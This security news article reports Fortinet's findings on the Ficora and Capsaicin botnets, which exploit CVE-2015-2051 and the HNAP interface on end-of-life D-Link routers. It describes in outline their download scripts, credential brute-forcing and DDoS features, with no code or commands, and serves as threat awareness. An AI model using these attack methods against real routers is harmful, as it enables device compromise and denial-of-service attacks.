6 January 2025

Ficora and Capsaicin botnets target EoL D-Link routers


Ficora and Capsaicin botnets target EoL D-Link routers

Two botnets, tracked as “Ficora” and “Capsaicin,” have been observed ramping up attacks on outdated and end-of-life D-Link routers, according to Fortinet’s researchers.

Among the targeted models are popular D-Link routers widely used by both individuals and organizations, including DIR-645, DIR-806, GO-RT-AC750, DIR-845L. For initial access the attackers exploit known vulnerabilities such as CVE-2015-2051.

Once compromised, the botnets take advantage of flaws in D-Link’s management interface, specifically through the HNAP (Home Network Administration Protocol), to execute malicious commands via the GetDeviceSettings action.

Both botnets are capable of stealing data, executing shell scripts, launching distributed denial-of-service (DDoS) attacks.

Ficora, appears to be a new variant of the notorious Mirai botnet, which has been optimized to exploit vulnerabilities specific to D-Link routers. Fortinet’s telemetry data shows that Ficora’s activity spreads across the globe, with notable focus on Japan and the United States. Two activity surges were recorded in October and November 2024.

After gaining access, Ficora deploys a shell script named ‘multi,’ which downloads and executes its payload using multiple methods such as wget, curl, ftpget, and tftp. The malware also includes a brute force component with hard-coded credentials, enabling it to spread to other Linux-based devices. Ficora’s DDoS capabilities include UDP flooding, TCP flooding, DNS amplification.

Capsaicin, linked to the Keksec group known for malware like EnemyBot has been first spotted in October 2024 targeting primarily East Asian countries. The botnet uses a downloader script (“bins.sh”) to fetch binaries with the prefix ‘yakuza’ for various architectures, including ARM, MIPS, SPARC, and x86.

Capsaicin is capable of disabling other botnet payloads active on the same device. In addition to DDoS capabilities similar to Ficora’s, Capsaicin can gather host information and exfiltrate it to its command-and-control (C2) server.

Back to the list

Latest Posts

Cybersecurity Week in Review: January 24, 2025

Cybersecurity Week in Review: January 24, 2025

In brief: SonicWall SMA zero-day exploited in attacks, hackers are exploiting older Ivanti flaws, and more.
24 January 2025
AIRASHI DDoS botnet exploits a zero-day vulnerability in cnPilot routers

AIRASHI DDoS botnet exploits a zero-day vulnerability in cnPilot routers

The attacks have been active since June 2024.
23 January 2025
SonicWall SMA zero-day exploited in attacks

SonicWall SMA zero-day exploited in attacks

SonicWall has released a patch in version 12.4.3-02854 and higher versions to address the issue.
23 January 2025